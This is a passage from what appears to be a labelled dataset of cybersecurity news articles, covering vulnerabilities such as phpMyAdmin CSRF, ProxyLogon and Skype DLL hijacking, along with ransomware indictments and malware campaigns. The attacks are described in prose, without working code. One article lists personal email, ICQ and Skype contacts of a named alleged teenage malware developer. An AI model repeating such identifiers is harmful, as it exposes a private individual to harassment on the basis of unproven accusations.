Earlier this year, Kaspersky warned of a set of malicious Android applications posing as security software. Zeus was sitting behind those apps, ready to siphon off text messages.
",Vulnerability
Critical Flaw Reported In phpMyAdmin Lets Attackers Damage Databases,https://thehackernews.com/2018/01/phpmyadmin-hack.html,"A critical security vulnerability has been reported in phpMyAdmin—one of the most popular applications for managing the MySQL database—which could allow remote attackers to perform dangerous database operations just by tricking administrators into clicking a link.
Discovered by an Indian security researcher, Ashutosh Barot, the vulnerability is a cross-site request forgery (CSRF) attack and affects phpMyAdmin versions 4.7.x (prior to 4.7.7).
Cross-site request forgery vulnerability, also known as XSRF, is an attack wherein an attacker tricks an authenticated user into executing an unwanted action.
According to an advisory released by phpMyAdmin, ""by deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables, etc.""
phpMyAdmin is a free and open source administration tool for MySQL and MariaDB and is widely used to manage the database for websites created with WordPress, Joomla, and many other content management platforms.
Moreover, a lot of hosting providers use phpMyAdmin to offer their customers a convenient way to organize their databases.
Barot has also released a video, as shown above, demonstrating how a remote attacker can make database admins unknowingly delete (DROP) an entire table from the database just by tricking them into clicking a specially crafted link.
""A feature of phpMyAdmin was using a GET request and after that POST request for Database operations such as DROP TABLE table_name; GET requests must be protected against CSRF attacks. In this case, POST requests were used which were sent through URL (for bookmarking purpose may be); it was possible for an attacker to trick a database admin into clicking a button and perform a drop table database query of the attacker's choice."" Barot explains in a blog post.
However, performing this attack is not simple as it may sound. To prepare a CSRF attack URL, the attacker should be aware of the name of targeted database and table.
""If a user executes a query on the database by clicking insert, DROP, etc. buttons, the URL will contain database name and table name,"" Barot says. ""This vulnerability can result in the disclosure of sensitive information as the URL is stored at various places such as browser history, SIEM logs, Firewall Logs, ISP Logs, etc.""
Barot reported the vulnerability to phpMyAdmin developers, who confirmed his finding and released phpMyAdmin 4.7.7 to address this issue. So administrators are highly recommended to update their installations as soon as possible.
",Vulnerability
Internet Traffic Hijacking Linux Flaw Affects 80% of Android Devices,https://thehackernews.com/2016/08/hack-linux-android.html,"An estimated 80 percent of Android smartphones and tablets running Android 4.4 KitKat and higher are vulnerable to a recently disclosed Linux kernel flaw that allows hackers to terminate connections, spy on unencrypted traffic or inject malware into the parties' communications.
Even the latest Android Nougat Preview is considered to be vulnerable.
The security flaw was first appeared in the implementation of the TCP protocol in all Linux systems deployed since 2012 (version 3.6 and above of the Linux OS kernel) and the Linux Foundation has already patched the Linux kernel on July 11, 2016.
However, the vulnerability (CVE-2016-5696) is now affecting a large portion of the Android ecosystem.
According to a blog post published Monday by mobile security firm Lookout, the Linux flaw is present in Android version 4.4 KitKat and all future releases, including the latest developer preview of Android Nougat.
Around 1.4 BILLLLLION Android Devices Affected
This means that 80% of all Android devices in use today, which is nearly 1.4 Billion devices, are vulnerable to attacks, enabling hackers to spy on your communications without even compromising your network via man-in-the-middle-attack.
However, the good news is that the Linux vulnerability is complicated and difficult to exploit, but the risk is there especially for targeted attacks.
""While a man-in-the-middle attack is not required here, the attacker still needs to know a source and destination IP address to successfully execute the attack,"" Lookout stated in the blog post.
Windows and Macs are not affected by the vulnerability.
According to Google, engineers are already aware of the vulnerability and are ""taking the appropriate actions"" to fix the issue, a Google representative told Ars Technica. So, it is likely that a patch for Android will arrive soon.
Temporary Mitigation:
Make sure your Internet traffic is encrypted: Apps you use and Websites you visit should employ HTTPS.
Use a Virtual Private Network (VPN).
To know more about the Linux kernel flaw and its mitigation, you can head on to our post, titled ""Linux TCP Flaw allows Hackers to Hijack Internet Traffic and Inject Malware Remotely.""
",Vulnerability
Vulnerability in Whatsapp messenger media server,https://thehackernews.com/2013/06/Hacking-whatsapp-android-application.html,"If you own an iPhone or an Android device, then the chances are high that you're familiar with the extremely popular cross-platform messaging app, WhatsApp.
According to a whitehat hacker Mohammed Saeed, Whatsapp media server (media.whatsapp.com) interface was vulnerable to Traversal local file inclusion. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.
Flaw allowed hacker to gather usernames via an ""/etc/passwd"" file and also another sensitive files like log files i.e ""/apache/logs/error.log"" or ""/apache/logs/access.log"".
Flaw was reported by Mohammed with proof of conpect to Whatsapp security team on 27th May and was addressed this week.
If you are also penetration tester and have something buggy that can help Whatsapp team to make there service more secure, feel free to contact them at support@whatsapp.com.
",Vulnerability
Microsoft Won't Patch a Severe Skype Vulnerability Anytime Soon,https://thehackernews.com/2018/02/hacking-skype.html,"A serious vulnerability has been discovered in Microsoft-owned most popular free web messaging and voice calling service Skype that could potentially allow attackers to gain full control of the host machine by granting system-level privileges to a local, unprivileged user.
The worst part is that this vulnerability will not be patched by Microsoft anytime soon.
It's not because the flaw is unpatchable, but because fixing the vulnerability requires a significant software rewrite, which indicates that the company will need to issue an all-new version of Skype rather than just a patch.
The vulnerability has been discovered and reported to Microsoft by security researcher Stefan Kanthak and resides in Skype's update installer, which is susceptible to Dynamic Link Libraries (DLL) hijacking.
According to the researcher, a potential attacker could exploit the ""functionality of the Windows DLL loader where the process loading the DLL searches for the DLL to be loaded first in the same directory in which the process binary resides and then in other directories.""
The exploitation of this preferential search order would allow the attacker to hijack the update process by downloading and placing a malicious version of a DLL file into a temporary folder of a Windows PC and renaming it to match a legitimate DLL that can be modified by an unprivileged user without having any special account privileges.
When Skype's update installer tries to find the relevant DLL file, it will find the malicious DLL first, and thereby will install the malicious code.
Although Kanthak demonstrated the attack using the Windows version of Skype, he believes the same DLL hijacking method could also work against other operating systems, including Skype versions for macOS and Linux.
Kanthak informed Microsoft of the Skype vulnerability back in September, but the company told him that the patch would require the Skype update installer go through ""a large code revision,"" Kanthak told ZDNet.
So rather than releasing a security update, Microsoft decided to build an altogether new version of the Skype client that would address the vulnerability.
It should be noted that this vulnerability only affects the Skype for the desktop app, which uses its update installer which is vulnerable to the DLL hijacking technique. The Universal Windows Platform (UWP) app version available from the Microsoft Store for Windows 10 PCs is not affected.
The vulnerability has been rated as ""medium"" in severity, but Kanthak said, ""the attack could be easily weaponized."" He gave two examples, which have not been released yet.
Until the company issues an all-new version of Skype client, users are advised to exercise caution and avoid clicking on attachments provided in an email. Also, make sure you run appropriate and updated anti-virus software that offers some defence against such attacks.
This is not the first time Skype has been dealing with a severe security flaw. In June 2017, a critical flaw in Skype was revealed before Microsoft released a fix for the issue that allowed hackers to crash systems and execute malicious code in them.
Last month, among several messaging applications, Skype was also dealing with a critical remote code execution vulnerability in Electron—a popular web application framework widely-used in desktop applications.
",Vulnerability
Plugx RAT targeting government organizations in Japan using spear phishing,https://thehackernews.com/2012/09/plugx-rat-targeting-government.html,"Roland Dela Paz (Threat Researcher) at TrendMirco reported that last year a Malware Campaign to target specific users in Japan, China, and Taiwan once again on rise using new breed of Remote Access Tool (RAT) called Plugx (also known as Korplug). This new custom made version comes for less recognition and more elusiveness from security researchers.
He also mention that last year campaign used the Poison Ivy RAT, but now its Plugx take its place. ""Similar to previous Poison Ivy campaigns, it also arrives as an attachment to spear-phished emails either as an archived, bundled file or specially crafted document that exploits a vulnerability in Adobe Acrobat Reader or Microsoft Office. We've also encountered an instance of Plugx aimed at a South Korean Internet company and a U.S. engineering firm."" Roland mentioned.
The attached pdf exploits CVE-2010-2883 (with Plugx (RAT) payload connects to a command and control (C&C) server named {BLOCKED}eo.flower-show.org.
CVE-2010-2883: Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010)
This C&C server appeared to be have been used by Poison Ivy and PlugX variants. According to Roland this rat drop a file at %System Root%\Documents and Settings\All Users\SxS\bug.log which contain it own errors and then possibly it uploads back to attacker server for Auditing. This shows that , this variant is still in beta stage. Trend Micro monitoring PlugX's development and We at THE HACKER NEWS, will update you with new info when published.
",Vulnerability
ProxyLogon PoC Exploit Released; Likely to Fuel More Disruptive Cyber Attacks,https://thehackernews.com/2021/03/proxylogon-exchange-poc-exploit.html,"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) on Wednesday issued a joint advisory warning of active exploitation of vulnerabilities in Microsoft Exchange on-premises products by nation-state actors and cybercriminals.
""CISA and FBI assess that adversaries could exploit these vulnerabilities to compromise networks, steal information, encrypt data for ransom, or even execute a destructive attack,"" the agencies said. ""Adversaries may also sell access to compromised networks on the dark web.""
The attacks have primarily targeted local governments, academic institutions, non-governmental organizations, and business entities in various industry sectors, including agriculture, biotechnology, aerospace, defense, legal services, power utilities, and pharmaceutical, which the agencies say are in line with previous activity conducted by Chinese cyber actors.
Tens of thousands of entities, including the European Banking Authority and the Norwegian Parliament, are believed to have been breached to install a web-based backdoor called the China Chopper web shell that grants the attackers the ability to plunder email inboxes and remotely access the target systems.
The development comes in light of the rapid expansion of attacks aimed at vulnerable Exchange Servers, with multiple threat actors exploiting the vulnerabilities as early as February 27 before they were eventually patched by Microsoft last week, swiftly turning what was labeled as ""limited and targeted"" into an indiscriminate mass exploitation campaign.
While there is no concrete explanation for the widespread exploitation by so many different groups, speculations are that the adversaries shared or sold exploit code, resulting in other groups being able to abuse these vulnerabilities, or that the groups obtained the exploit from a common seller.
From RCE to Web Shells to Implants
On March 2, 2021, Volexity publicly disclosed the detection of multiple zero-day exploits used to target flaws in on-premises versions of Microsoft Exchange Servers, while pegging the earliest in-the-wild exploitation activity on January 3, 2021.
Successful weaponization of these flaws, called ProxyLogon, allows an attacker to access victims' Exchange Servers, enabling them to gain persistent system access and control of an enterprise network.
Although Microsoft initially pinned the intrusions on Hafnium, a threat group that's assessed to be state-sponsored and operating out of China, Slovakian cybersecurity firm ESET on Wednesday said it identified no fewer than 10 different threat actors that likely took advantage of the remote code execution flaws to install malicious implants on victims' email servers.
Apart from Hafnium, the five groups detected as exploiting the vulnerabilities prior to the patch release are Tick, LuckyMouse, Calypso, Websiic, and Winnti (aka APT41 or Barium), with five others (Tonto Team, ShadowPad, ""Opera"" Cobalt Strike, Mikroceen, and DLTMiner) scanning and compromising Exchange servers in the days immediately following the release of the fixes.
No conclusive evidence has emerged so far connecting the campaign to China, but DomainTools' Senior Security Researcher Joe Slowik noted that several of the aforementioned groups have been formerly linked to China-sponsored activity, including Tick, LuckyMouse, Calypso, Tonto Team, Mikroceen, and the Winnti Group, indicating that Chinese entities other than Hafnium are tied to the Exchange exploitation activity.
""It seems clear that there are numerous clusters of groups leveraging these vulnerabilities, the groups are using mass scanning or services that allow them to independently target the same systems, and finally there are multiple variations of the code being dropped, which may be indicative of iterations to the attack,"" Palo Alto Networks' Unit 42 threat intelligence team said.
In one cluster tracked as ""Sapphire Pigeon"" by researchers from U.S.-based Red Canary, attackers dropped multiple web shells on some victims at different times, some of which were deployed days before they conducted follow-on activity.
According to ESET's telemetry analysis, more than 5,000 email servers belonging to businesses and governments from over 115 countries are said to have been affected by malicious activity related to the incident. For its part, the Dutch Institute for Vulnerability Disclosure (DIVD) reported Tuesday that it found 46,000 servers out of 260,000 globally that were unpatched against the heavily exploited ProxyLogon vulnerabilities.
Troublingly, evidence points to the fact that the deployment of the web shells ramped up following the availability of the patch on March 2, raising the possibility that additional entities have opportunistically jumped in to create exploits by reverse engineering Microsoft updates as part of multiple, independent campaigns.
""The day after the release of the patches, we started to observe many more threat actors scanning and compromising Exchange servers en masse,"" said ESET researcher Matthieu Faou. ""Interestingly, all of them are APT groups focused on espionage, except one outlier that seems related to a known coin-mining campaign (DLTminer). It is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.""
Aside from installing the web shell, other behaviors related to or inspired by Hafnium activity include conducting reconnaissance in victim environments by deploying batch scripts that automate several functions such as account enumeration, credential-harvesting, and network discovery.
Public Proof-of-Concept Available
Complicating the situation further is the availability of what appears to be the first functional public proof-of-concept (PoC) exploit for the ProxyLogon flaws despite Microsoft's attempts to take down exploits published on GitHub over the past few days.
""I've confirmed there is a public PoC floating around for the full RCE exploit chain,"" security researcher Marcus Hutchins said. ""It has a couple bugs but with some fixes I was able to get shell on my test box.""
Also accompanying the PoC's release is a detailed technical write-up by Praetorian researchers, who reverse-engineered CVE-2021-26855 to build a fully functioning end-to-end exploit by identifying differences between the vulnerable and patched versions.
While the researchers deliberately decided to omit critical PoC components, the development has also raised concerns that the technical information could further accelerate the development of a working exploit, in turn triggering even more threat actors to launch their own attacks.
As the sprawling hack's timeline slowly crystallizes, what's clear is that the surge of breaches against Exchange Server appears to have happened in two phases, with Hafnium using the chain of vulnerabilities to stealthily attack targets in a limited fashion, before other hackers began driving the frenzied scanning activity starting February 27.
Cybersecurity journalist Brian Krebs attributed this to the prospect that ""different cybercriminal groups somehow learned of Microsoft's plans to ship fixes for the Exchange flaws a week earlier than they'd hoped.""
""The best advice to mitigate the vulnerabilities disclosed by Microsoft is to apply the relevant patches,"" Slowik said. ""However, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities to counter existing intrusions.""
",Vulnerability
Warning – 3 Popular VPN Services Are Leaking Your IP Address,https://thehackernews.com/2018/03/vpn-leak-ip-address.html,"Researchers found critical vulnerabilities in three popular VPN services that could leak users' real IP addresses and other sensitive data.
VPN, or Virtual Private Network, is a great way to protect your daily online activities that work by encrypting your data and boosting security, as well as useful to obscure your actual IP address.
While some choose VPN services for online anonymity and data security, one major reason many people use VPN is to hide their real IP addresses to bypass online censorship and access websites that are blocked by their ISPs.
But what if when the VPN you thought is protecting your privacy is actually leaking your sensitive data and real location?
A team of three ethical hackers hired by privacy advocate firm VPN Mentor revealed that three popular VPN service providers—HotSpot Shield, PureVPN, and Zenmate—with millions of customers worldwide were found vulnerable to flaws that could compromise user's privacy.
The team includes application security researcher Paulos Yibelo, an ethical hacker known by his alias 'File Descriptor' and works for Cure53, and whereas, the identity of third one has not been revealed on demand.
PureVPN is the same company who lied to have a 'no log' policy, but a few months ago helped the FBI with logs that lead to the arrest of a Massachusetts man in a cyberstalking case.
After a series of privacy tests on the three VPN services, the team found that all three VPN services are leaking their users' real IP addresses, which can be used to identify individual users and their actual location.
Concerning consequences for end users, VPN Mentor explains that the vulnerabilities could ""allow governments, hostile organizations [sic], or individuals to identify the actual IP address of a user, even with the use of the VPNs.""
The issues in ZenMate and PureVPN have not been disclosed since they haven't yet patched, while VPN Mentor says the issues discovered in ZenMate VPN were less severe than HotSpot Shield and PureVPN.
The team found three separate vulnerabilities in AnchorFree's HotSpot Shield, which have been fixed by the company. Here's the list:
Hijack all traffic (CVE-2018-7879) — This vulnerability resided in Hotspot Shield's Chrome extension and could have allowed remote hackers to hijack and redirect victim's web traffic to a malicious site.
DNS leak (CVE-2018-7878) — DNS leak flaw in Hotspot Shield exposed users' original IP address to the DNS server, allowing ISPs to monitor and record their online activities.
Real IP Address leak (CVE-2018-7880) — This flaw poses a privacy threat to users since hackers can track user's real location and the ISP. the issue occurred because the extension had a loose whitelist for ""direct connection."" Researchers found that any domain with localhost, e.g., localhost.foo.bar.com, and 'type=a1fproxyspeedtest' in the URL bypass the proxy and leaks real IP address.
Here it must be noted that all the three vulnerabilities were in the HotSpot Shield's free Chrome plug-in, not in the desktop or smartphone apps.
The researchers also reported similar vulnerabilities in the Chrome plugins of Zenmate and PureVPN, but for now, the details of the bugs are being kept under wraps since both the manufacturers have not yet fixed them.
Researchers believe that most other VPN services also suffer from similar issues.
",Vulnerability
Microsoft Says Russia Tried to Hack Three 2018 Midterm Election Candidates,https://thehackernews.com/2018/07/russia-election-hacking.html,"Microsoft said it detected and helped the US government to block Russian hacking attempts against at least three congressional candidates this year, a Microsoft executive revealed speaking at the Aspen Security Forum today.
Although the company refused to name the targets but said, the three candidates were ""people who, because of their positions, might have been interesting targets from an espionage standpoint as well as an election disruption standpoint.""
According to the company, the Russian hackers targeted the candidates' staffers with phishing attacks, redirecting them to a fake Microsoft website, in an attempt to steal their credentials.
""Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks,"" said Tom Burt, Microsoft's vice president for customer security.
""And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections.""
Immediately after learning of this incident, Microsoft took down the fake domain and worked with the government to ""avoid anybody being infected by that particular attack.""
The company also ensured that none of the targeted campaign staffers were infected by the attack.
Burt specified that the hacking attempts were conducted by a Russian hacking group, though so far the group has been less active compared to 2016, during the U.S. presidential election.
Microsoft ""discovered that these [fake domains] were being registered by an activity group that at Microsoft we call Strontium...that's known as Fancy Bear or APT 28,"" Burt said.
""The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections,"" he added.
For instance, Burt said the hackers are not infiltrating think tanks and targeting academia experts that they did during the 2016 presidential election.
However, Burt warned that ""That does not mean we're not going to see it, there is a lot of time left before the election.""
",Cyber_Attack
U.S Charges Two Iranian Hackers for SamSam Ransomware Attacks,https://thehackernews.com/2018/11/samsam-ransomware-iranian-hackers.html,"The Department of Justice announced Wednesday charges against two Iranian nationals for their involvement in creating and deploying the notorious SamSam ransomware.
The alleged hackers, Faramarz Shahi Savandi, 34, and Mohammad Mehdi Shah, 27, have been charged on several counts of computer hacking and fraud charges, the indictment unsealed today at New Jersey court revealed.
The duo used SamSam ransomware to extort over $6 million in ransom payments since 2015, and also caused more than $30 million in damages to over 200 victims, including hospitals, municipalities, and public institutions.
According to the indictment, Savandi and Mansouri have been charged with a total of six counts, including one count of conspiracy to commit wire fraud, one count of conspiracy to commit fraud and related activity in connection with computers, two counts of intentional damage to a protected computer, and two counts of transmitting a demand in relation to damaging a protected computer.
Since both hackers live in and operated from Iran, they have not yet been arrested by the United States authorities and the FBI has added them on their list of wanted hackers.
According to the indictment, Savandi and Mansouri created the first version of the SamSam Ransomware in December 2015 and created further refined versions of the threat in June and October 2017.
""Defendants authored various versions of the SamSam Ransomware, which was designed to encrypt data on Victim computers. SamSam Ransomware was designed to maximize the damage caused to the Victim by, for instance, also encrypting backups of the targeted computers,"" the indictment says.
""Defendants used a variety of methods to gain access to Victim computer networks, including exploiting known security vulnerabilities in common server software and utilizing virtual private servers such as European VPS #1 and European VPS #2 to mask their identities.""
Unlike most ransomware infections, SamSam was not distributed in an unplanned way via spam email campaigns. Instead, the attackers chose potential targets and infected systems manually.
Attackers first compromised the RDP on a targeted system—either by conducting brute force attacks or using stolen credentials—and then attempted to strategically deploy SamSam throughout the network by exploiting vulnerabilities in other systems.
Once on the entire network, SamSam encrypts the system's data and demands a huge ransom payment (usually more than $50,000 which is much higher than normal) in Bitcoin in exchange for the decryption keys.
Since December 2015, SamSam has significantly targeted some large organizations, including the Atlanta city government, the Colorado Department of Transportation, several hospitals and educational institutions like the Mississippi Valley State University.
""According to the indictment, [affected victims includes] the City of Atlanta, the City of Newark, the Port of San Diego, the Colorado Department of Transportation, the University of Calgary, Hollywood Presbyterian Medical Centers, Kansas Heart Hospital, MedStar Health, Nebraska Orthopedic Hospital, and Allscripts Healthcare Solutions Inc.""
The Atlanta city's officials refused to pay the ransomware, and the recovery effort cost them estimated $17 million.
Leaving behind other well-known ransomware viruses like WannaCry and NotPetya, SamSam became the largest paid ransomware of its kind with one individual victim paid $64,000.
Since Iran has no extradition policy with the United States, the indictment may not guarantee the extraditions or convictions of the two alleged hackers. But being on the wanted list of the FBI make it difficult for the duo to travel outside their country's boundary freely.
",Cyber_Attack
Joomscan Security Scanner - Detect more than 550 Joomla vulnerabilities,https://thehackernews.com/2011/11/joomscan-security-scanner-detect-more.html,"Joomscan Security Scanner - Detect more than 550 Joomla vulnerabilities
Joomscan Security Scanner updated recently with new database have 550 vulnerabilities. Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla web site. Last update for this tool was in August, 2009 with 466 vulnerabilities.
How to Use Joomscan, read here.
In joomscan you can check for new updates with command: ./joomscan.pl check or ./joomscan.pl update.
Download for Windows (141 KB)
Download for Linux (150 KB)
More Info
",Vulnerability
"Samsung Launches Bug Bounty Program — Offering up to $200,000 in Rewards",https://thehackernews.com/2017/09/samsung-bug-bounty-program.html,"With the growing number of cyber attacks and data breaches, a number of tech companies and organisations have started Bug Bounty programs for encouraging hackers, bug hunters and researchers to find and responsibly report bugs in their services and get rewarded.
Samsung is the latest in the list of tech companies to launch a bug bounty program, announcing that the South Korean electronics giant will offer rewards of up to $200,000 to anyone who discovers vulnerabilities in its mobile devices and associated software.
Dubbed Mobile Security Rewards Program, the newly-launched bug bounty program will cover 38 Samsung mobile devices released from 2016 onwards which currently receive monthly or quarterly security updates from the company.
So, if you want to take part in the Samsung Mobile Security Rewards Program, you have these devices as your target—the Galaxy S, Galaxy Note, Galaxy A, Galaxy J, and the Galaxy Tab series, as well as Samsung's flagship devices, the S8, S8+, and Note 8.
""We take security and privacy issues very seriously; and as an appreciation for helping Samsung Mobile improve the security of our products and minimizing risk to our end-consumers, we are offering a rewards program for eligible security vulnerability reports,"" the company explains on its bug bounty website.
""We look forward to your continued interests and participations in our Samsung Mobile Security Rewards Program. Through this rewards program, we hope to build and maintain valuable relationships with researchers who coordinate disclosure of security issues with Samsung Mobile.""
Not just mobile devices, the tech giant's Mobile Services suite is also part of its bug bounty program, which will also cover apps and services such as Bixby, Samsung Account, Samsung Pay, Samsung Pass, among others.
For the eligibility of a reward, researchers and bug hunters need to provide a valid proof-of-concept (PoC) exploit that can compromise a Samsung handset without requiring any physical connection or third-party application.
The company will evaluate the reward depending on the severity level of the vulnerability (Critical, High, Moderate, and Low) and its impact on devices. The least reward is $200, which is for low-severity flaws, while the highest reward is $200,000, which is for critical bugs.
The Higher reward will be offered for bugs that lead to trusted execution environment (TEE) or Bootloader compromise. The level of severity will be determined by Samsung.
Samsung's bounty of $200,000 is equal to the bounty reward offered under Apple's bug bounty program but is slightly lower than Microsoft's newly launched bounty program that offers $250,000 for Windows 10 security bugs.
Following the path of major tech companies, the non-profit group behind Tor Project recently joined hands with HackerOne to launch its own bug bounty program, with the highest payout for the flaws has been kept $4,000.
So, what you are waiting for? Hunt for bugs in Samsung products and submit your findings to the company via the Security Reporting page.
",Vulnerability
More than 100 Pakistani Government Sites Under Malware attack,https://thehackernews.com/2011/11/more-than-100-pakistani-government.html,"More than 100 Pakistani Government Sites Under Malware attack
Website Malware : A newer form of malware is what can be found attacking websites today. In the old days malware was mostly in the form of computer viruses. In today's age of globalization, malware starts to target websites and mobile devices.
Almost 100's of Pakistan Government sites are under attack by Godzilla Malware, Which is Created and implemented by an Indian Hacker. Hacker named ""Godzilla"" publish a list of all Freezed sites list here ,including Peshawar Electric Supply Company website (www.pesco.gov.pk), Ministry of Information and Broadcasting - Government of Pakistan website (www.infopak.gov.pk), Pakistan Navy website (www.paknavy.gov.pk) and Many more.
Hacker said,""The malware is freezing the sever and if the server is changed then banner of malware hits the live ip..""
Today malware is much more sinister. It is backed up by an industry which some estimate at $2 billion a year. It is all about making money. Get More Malware News on The Hacker News.
",Malware
Chinese Hackers Steal Info from top secret U.S military data,https://thehackernews.com/2013/05/chinese-hackers-steal-info-from-top.html,"QinetiQ, a UK-based defense contractor suffers humiliation as intelligence officials confirmed that China was able to steal the U.S. classified documents and pertinent technological information all this because of QinetiQ's faulty decision-making.
QinetiQ North America (QQ) a world leading defense technology and security company providing satellites, drones and software services to the U.S. Special Forces deployed in Afghanistan and Middle East.
The hacking was so extensive that external consultants ended up more or less working permanently inside the firm to root out malicious software and compromises on an ongoing basis. In one of the attacks, that took place in 2009, the hackers raided at least 151 machines of the firm's Technology Solutions Group (TSG) over a 251-day period, stealing 20 gigabytes of data before being blocked.
As the White House moves to confront China over its theft of U.S. technology through hacking, policy makers are faced with the question of how much damage has already been done. 1.3 million pages of documents, including ones containing highly sensitive military information, were stolen at the time.
The agent had stumbled upon the breach as part of a separate investigation but apparently left out many key details including the fact that other contractors were being hit. Through 2008, is said to have treated the continuing pattern of hacks traced to its buildings as isolated incidents, including the compromise of 13,000 server passwords that attackers were used to help steal huge amounts of classified military engineering data.
QinetiQ committed the first mistake as it restricts its investigation on the first discovery of the spying. Even when NASA warned the firm that it was being attacked by hackers from one of QinetiQ's computers the firm apparently continued to treat incidents in isolation.
The hackers were able to exploit unpatched security flaws and other vulnerabilities across QNA to infiltrate multiple divisions of the company including Cyveillance, the company's cybersecurity unit. In 2010, HBGary, the security firm hacked in 2011 by Anonymous, was hired by QinetiQ along with Terremark to investigate the attacks. HBGary almost immediately identified malicious software on most of QinetiQ's computers.
The spying on QinetiQ and other defense contractors appears aimed at helping China leapfrog the U.S.'s technologically advanced military, foregoing years of research and development that would have cost billions of dollars
",Vulnerability
"Art of twitter account hacking, now or never !",https://thehackernews.com/2012/11/art-of-twitter-account-hacking-now-or.html,"Phishing is most commonly perpetrated through the mass distribution of e-mail messages directing users to a fraud web site or services. These professional criminals daily find new ways to commit old crimes, treating cyber crime like a business and forming global criminal communities. Another latest scam has been notified by GFI that, where cyber criminals are offering the art of hacking Twitter accounts with a web-based exploit.
Phishers are sending scam emails and offering fake twitter account hacking service, which in actual will hack their own twitter accounts.
Email from phishers have text, ""Do you want to learn how to hack twitter? Are you looking for a way to hack your friends twitter account without them finding out? Interested in finding out ways to hack someone's profile? Maybe you want to take a quick peek at their direct message inbox, steal their username or find a glitch to use a hacking script,"".
Hackers try to convince readers by showing a exploit code, and explain that how exactly the hack will be performed. Here phisher actually trying to trick user by asking values of parameters used in exploit, such as Victim username, your twitter username and your twitter password (in order to show authenticity).
Once reader will agree with the service in order to use it, they ask the end-user to email the above information to the site owner, along with fake code waffle as the subject line so ""the database knows how to read it in programming language.""
Users have to be very careful and protect themselves from these threats by using appropriate security software and being aware of the tricks used by cyber criminals. In actual there is no such exploit or way which can hack twitter account of anyone by just one click, if it can then our... @TheHackersNews is open for you !
",Malware
Detecting Advanced Persistent Threat with Network Traffic Analysis,https://thehackernews.com/2012/10/detecting-advanced-persistent-threat.html,"A high degree of stealthiness over a prolonged duration of operation in order to do a successful cyber attack can be defined as Advanced Persistent Threat. The attack objectives therefore typically extend beyond immediate financial gain, and compromised systems continue to be of service even after key systems have been breached and initial goals reached.
Today's successful targeted attacks use a combination of social engineering, malware, and backdoor activities. Nart Villeneuve and James Bennett (Senior Threat Researcher) from Trend Mirco provide an ultimate guide for Detecting (APT) Advanced Persistent Threat activities with Network Traffic Analysis, that can be used to identify malware command-and control (C&C) communications related to these attacks, illustrating how even the most high-profile and successful attacks of the past few years could have been discovered.
Paper cover Detecting Remote Access Trojans like The GhostNet, Nitro attack, RSA Breach, Taidoor campaign, Sykipot campaign and more. Nart also talk about the Challenges during Network-Based Detection i.e Two key factors pose challenges to network-based detection encryption and the cloud.
More than 90% of intrusions aren't even discovered by the victims themselves, but through third-party notification. In many cases, the APT has been on the victim network for months or even years, exfiltrating intellectual property data plus economic and political information.
""The ability to detect APT activity at the network level is heavily dependent on leveraging threat intelligence. A variety of very successful ongoing campaigns can be detected at the network level because their communications remain consistent over time.""
To get rid of such attacks you much know that what that information is, where it resides, who has access to it, why they have access and when they access it. Answering these types of questions should give you a clearer picture of what are the most critical pieces in your infrastructure that need your attention.
Modifications made to malware's network communications can, however, disrupt the ability to detect them. As such, the ongoing development of threat intelligence based on increased visibility and information sharing is critical to developing indicators used to detect such activity at the network level.
For advance detection techniques based upon Protocol-aware detection, HTTP headers, Compressed archives, Timing and size you can read complete paper available here.
",Malware
BlackPOS Malware used in TARGET Data Breach developed by 17-Year Old Russian Hacker,https://thehackernews.com/2014/01/BlackPOS-Malware-russian-hacker-Target.html,"The Holiday data breach at TARGET appeared to be part of a broad and highly sophisticated international hacking campaign against multiple retailers, involving the heist of possibly 110 million Credit-Debit cards, and personal information.
Target confirmed last weekend that a malicious software was embedded in point-of-sale (POS) equipment at its checkout counters to collect secure data as the credit cards were swiped during transactions.
The Malware called 'BlackPOS' also known as ""reedum"" or 'Kaptoxa' is an effective crimeware kit, that was created in March 2013 and available in underground sites for $1800-$2000.
Investigators from IntelCrawler found a 17-years old hacker who actually developed the BlackPOS crimeware kit. His nickname is 'ree4' and original name: 'Sergey Taraspov' from St.Petersburg and Nizhniy Novgorod (Russian Federation).
IntelCrawler's sources mentioned that the BlackPOS malware was created in March 2013 and first infected the Point-of-Sales environments in Australia, Canada and the US.
Alleged Russian hacker and malware developer Sergey Taraspov (ree4) sold more than 40 builds of BlackPOS to cybercriminals from Eastern Europe and other countries.
BlackPOS is a RAM-scraping malware totally written in VBScript i.e. It copies credit-card numbers from point-of-sale machines' RAM, in the instant after the cards are swiped and before the numbers are encrypted.
In December, after the TARGET data breach, the Symantec antivirus firm discovered the malware and dubbed as 'Infostealer.Reedum.C'.
'He is a very well known programmer of malicious code in underground and previously he has created several tools used in hacking community for brute force attacks, such as ""Ree4 mail brute"", and also earned some first money with social networks accounts hacking and DDoS attacks trainings, as well as software development including malicious code.'
More details about Sergey Taraspov (ree4):
E-mail 1: ree4@list.ru
E-mail 2: ree4@yandex.ru
ICQ: 565033
Skype: s.r.a.ree4
Now any of his toolkit buyer is possibly the culprit behind the Target data breach. According to researchers, the attackers somehow managed hack one of the TARGET server and uploaded the POS malware to the checkout machines located at various stores.
IntelCrawler didn't accuse him of the Target heist, but ""He is still visible for us, but the real bad actors responsible for the past attacks on retailers such as Target and Neiman Marcus were just his customers"". They said.
",Malware
U.S. Trade Group Hacked by Chinese Hackers ahead of Trump-Xi Trade Summit,https://thehackernews.com/2017/04/hacking-trump-xi-trade.html,"Researchers have uncovered a Chinese cyber-espionage against the United States ahead of the trade summit on Thursday between US President Donald Trump and China's President Xi Jinping.
